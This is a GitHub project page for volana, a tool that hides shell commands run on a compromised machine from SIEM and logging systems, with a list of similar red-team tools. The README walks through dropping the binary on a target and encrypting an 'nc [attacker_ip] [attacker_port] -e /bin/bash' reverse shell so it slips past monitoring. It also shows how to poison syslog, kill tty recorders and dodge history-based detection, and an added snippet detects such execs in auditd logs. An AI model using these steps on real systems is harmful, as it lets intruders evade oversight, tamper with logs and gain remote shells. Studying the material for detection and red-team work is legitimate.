ariary / volana

License: Unlicense
🌒 Shell command obfuscation to avoid detection systems

Programming Languages

go
31211 projects - #10 most used programming language
Makefile
30231 projects

Projects that are alternatives of or similar to volana

1earn
Security knowledge framework maintained by the ffffffff0x team, covering (but not limited to) web security, ICS security, forensics, incident response, blue-team infrastructure deployment, post-exploitation, Linux security and writeups for various target machines
Stars: ✭ 3,715 (+9676.32%)
Mutual labels:  infosec, pentest, pentest-tool, redteam
Cloudbrute
Awesome cloud enumerator
Stars: ✭ 268 (+605.26%)
Mutual labels:  infosec, pentest-tool, redteam
NIST-to-Tech
An open-source listing of cybersecurity technology mapped to the NIST Cybersecurity Framework (CSF)
Stars: ✭ 61 (+60.53%)
Mutual labels:  infosec, pentest, redteam
Chashell
Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks.
Stars: ✭ 742 (+1852.63%)
Mutual labels:  infosec, pentest, redteam
haiti
🔑 Hash type identifier (CLI & lib)
Stars: ✭ 287 (+655.26%)
Mutual labels:  infosec, pentest, pentest-tool
moonwalk
Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps. 👻🐚
Stars: ✭ 544 (+1331.58%)
Mutual labels:  infosec, exploitation, redteam
Hershell
Hershell is a simple TCP reverse shell written in Go.
Stars: ✭ 442 (+1063.16%)
Mutual labels:  infosec, pentest, redteam
Winpwn
Automation for internal Windows penetration tests / AD security
Stars: ✭ 1,303 (+3328.95%)
Mutual labels:  exploitation, pentest-tool, redteam
Snoop
Snoop is a reconnaissance tool based on open data (OSINT world)
Stars: ✭ 886 (+2231.58%)
Mutual labels:  infosec, pentest, redteam
Jiraffe
One stop place for exploiting Jira instances in your proximity
Stars: ✭ 157 (+313.16%)
Mutual labels:  infosec, exploitation, redteam
Cloakify
CloakifyFactory - Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection
Stars: ✭ 1,136 (+2889.47%)
Mutual labels:  infosec, pentest, pentest-tool
1earn
Personally maintained security knowledge framework, covering (but not limited to) web security, ICS security, forensics, incident response, blue-team infrastructure deployment, post-exploitation, Linux security and writeups for various target machines
Stars: ✭ 776 (+1942.11%)
Mutual labels:  pentest, pentest-tool, redteam
Overlord
Overlord - Red Teaming Infrastructure Automation
Stars: ✭ 258 (+578.95%)
Mutual labels:  pentest, pentest-tool, redteam
PyParser-CVE
Multi source CVE/exploit parser.
Stars: ✭ 25 (-34.21%)
Mutual labels:  infosec, pentest, pentest-tool
crawleet
Web Recon & Exploitation Tool.
Stars: ✭ 48 (+26.32%)
Mutual labels:  pentest, exploitation, pentest-tool
Getaltname
Extract subdomains from SSL certificates in HTTPS sites.
Stars: ✭ 320 (+742.11%)
Mutual labels:  infosec, pentest, pentest-tool
Dumpsterfire
"Security Incidents In A Box!" A modular, menu-driven, cross-platform tool for building customized, time-delayed, distributed security events. Easily create custom event chains for Blue- & Red Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts.
Stars: ✭ 775 (+1939.47%)
Mutual labels:  infosec, pentest, pentest-tool
Wsmanager
Webshell Manager
Stars: ✭ 99 (+160.53%)
Mutual labels:  infosec, pentest, redteam
Docker Security Images
🔐 Docker Container for Penetration Testing & Security
Stars: ✭ 172 (+352.63%)
Mutual labels:  infosec, pentest, pentest-tool
github-watchman
Monitoring GitHub for sensitive data shared publicly
Stars: ✭ 60 (+57.89%)
Mutual labels:  infosec, redteam

volana (moon in Malagasy)

{ Use it ; 🌚(hide from); 🌞(detected by) } 

Shell command obfuscation to avoid SIEM/detection system

During a pentest, an important aspect is to be stealthy. For this reason you should clear your tracks after your passage. Nevertheless, many infrastructures log commands and send them to a SIEM in real time, which makes cleaning up afterwards, on its own, useless.

volana provides a simple way to hide commands executed on a compromised machine by providing its own shell runtime (enter your command, volana executes it for you). This way you clear your tracks DURING your passage.

Usage

You need an interactive shell. (Find a way to spawn one, you are a hacker, it's your job! Otherwise, see the non-interactive shell section below.) Then download volana on the target machine and launch it. That's it, now you can type the commands you want to be stealthily executed.

## Download it from the GitHub release
## If you do not have internet access from the compromised machine, find another way
curl -LO https://github.com/ariary/volana/releases/latest/download/volana

## Execute it
./volana

## You are now under the radar
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1  # you are allowed to be a bit cocky
volana » [command]

Keywords for the volana console:

  • ring: enable ring mode, i.e. each command is launched alongside plenty of others to cover tracks (against solutions that monitor system calls)
  • exit: exit the volana console

From a non-interactive shell

Imagine you have a non-interactive shell (webshell or blind RCE): you can use the encrypt and decrypt subcommands. Beforehand, you need to build volana with an embedded encryption key.

On the attacker machine

## Build volana with an encryption key
make build.volana-with-encryption

## Transfer it to the TARGET (the only detectable command)
## [...]

## Encrypt the command you want to stealthily execute
## (Here an nc bindshell to obtain an interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND

Copy the encrypted command and execute it through your RCE on the target machine

./volana decr [encrypted_command]
## Now you have a bindshell: spawn it to make it interactive and use volana as usual to stay stealthy (./volana).
## Don't forget to remove the volana binary before leaving (the decryption key can easily be retrieved from it)

Why not just hide the command with echo [command] | base64 and decode it on the target with echo [encoded_command] | base64 -d | bash?

Because we want to be protected against systems that trigger an alert on base64 use or that look for base64 text in commands. We also want to make investigation difficult, and base64 isn't a real obstacle.

Detection

Keep in mind that volana is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.

By "detected" we mean whether an alert can be triggered when a certain command has been executed.

Hide from

Only the volana launch command line will be caught. 🧠 However, by adding a space before executing it, the default bash behaviour is to not save it

  • Detection systems based on the output of the history command
  • Detection systems based on history files
    • .bash_history, .zsh_history, etc.
  • Detection systems based on bash debug traps
  • Detection systems based on sudo's built-in logging
  • Detection systems tracing all process syscalls system-wide (e.g. opensnoop)
  • Terminal (tty) recorders (script, screen -L, sexonthebash, ovh-ttyrec, etc.)
    • Easy to detect & avoid: pkill -9 script
    • Not a common case
    • screen is a bit more difficult to avoid; however, it does not record input (secret input: stty -echo => avoided)
    • Command detection could be avoided with volana with encryption

Visible for

  • Detection systems that alert on unknown commands (the volana one)
  • Detection systems based on a keylogger
    • Easy to avoid: copy/paste commands
    • Not a common case
  • Detection systems based on syslog files (e.g. /var/log/auth.log)
    • Only for sudo or su commands
    • syslog files could be modified and thus poisoned as you wish (e.g. for /var/log/auth.log: logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
  • Detection systems based on syscalls (e.g. auditd, LKM/eBPF)
    • Difficult to analyze; could be made unreadable by issuing several diversion syscalls
  • Custom LD_PRELOAD injection for logging
    • Not a common case at all
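As an added defender-side example (not volana's own code and not from this page), the two detection classes listed above that still see volana, "alert on unknown command" and syscall auditing such as auditd, can be combined in one rule: group auditd-style SYSCALL/EXECVE records by their audit serial and flag any exec whose binary lives outside an allow-list of trusted directories. The sample log lines and the TRUSTED_DIRS allow-list are constructed assumptions, not real captures.

```python
import re
from collections import defaultdict

# Directories from which command execution is considered expected (assumption
# for this example; a real allow-list is derived from the host's package set).
TRUSTED_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/local/bin/")

# Constructed sample in auditd SYSCALL/EXECVE record style (not a real capture):
# a normal `ls`, then a volana decr invocation launched from /tmp.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1700000000.101:201): arch=c000003e syscall=59 success=yes exit=0 ppid=1200 pid=1301 uid=1000 comm="ls" exe="/usr/bin/ls" key="exec"
type=EXECVE msg=audit(1700000000.101:201): argc=2 a0="ls" a1="-la"
type=SYSCALL msg=audit(1700000000.202:202): arch=c000003e syscall=59 success=yes exit=0 ppid=1200 pid=1302 uid=1000 comm="volana" exe="/tmp/volana" key="exec"
type=EXECVE msg=audit(1700000000.202:202): argc=3 a0="./volana" a1="decr" a2="PLACEHOLDER_CIPHERTEXT"
"""

SERIAL_RE = re.compile(r"msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\)")
KV_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_events(log_text):
    """Join SYSCALL and EXECVE records sharing an audit serial into one event."""
    events = defaultdict(dict)
    for line in log_text.splitlines():
        m = SERIAL_RE.search(line)
        if not m:
            continue
        # Quoted values keep their inner text; bare values are taken as-is.
        fields = {k: (q if raw.startswith('"') else raw) for k, raw, q in KV_RE.findall(line)}
        ev = events[m.group("serial")]
        ev["ts"] = m.group("ts")
        if fields.get("type") == "SYSCALL":
            ev["exe"], ev["uid"], ev["pid"] = fields.get("exe"), fields.get("uid"), fields.get("pid")
        elif fields.get("type") == "EXECVE":
            ev["argv"] = [fields.get(f"a{i}", "") for i in range(int(fields.get("argc", 0)))]
    return dict(events)


def find_untrusted_execs(log_text):
    """Return (serial, exe, argv) for every exec whose binary is outside TRUSTED_DIRS."""
    hits = []
    for serial, ev in sorted(parse_events(log_text).items()):
        exe = ev.get("exe")
        if exe and not exe.startswith(TRUSTED_DIRS):
            hits.append((serial, exe, ev.get("argv", [])))
    return hits


if __name__ == "__main__":
    for serial, exe, argv in find_untrusted_execs(SAMPLE_AUDIT_LOG):
        print(f"ALERT serial={serial} exe={exe} argv={' '.join(argv)}")
```

The rule keys on where the binary was executed from rather than on its name, so renaming the dropped binary does not change the verdict; the argv captured by the EXECVE record is kept for the analyst.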

Bug bounty

Sorry for the clickbait title, but no money will be provided to contributors. 🐛

Let me know if you have found:

  • a way to detect volana
  • a way of spying on the console that doesn't detect volana commands
  • a way to avoid a detection system

Report here

Credit
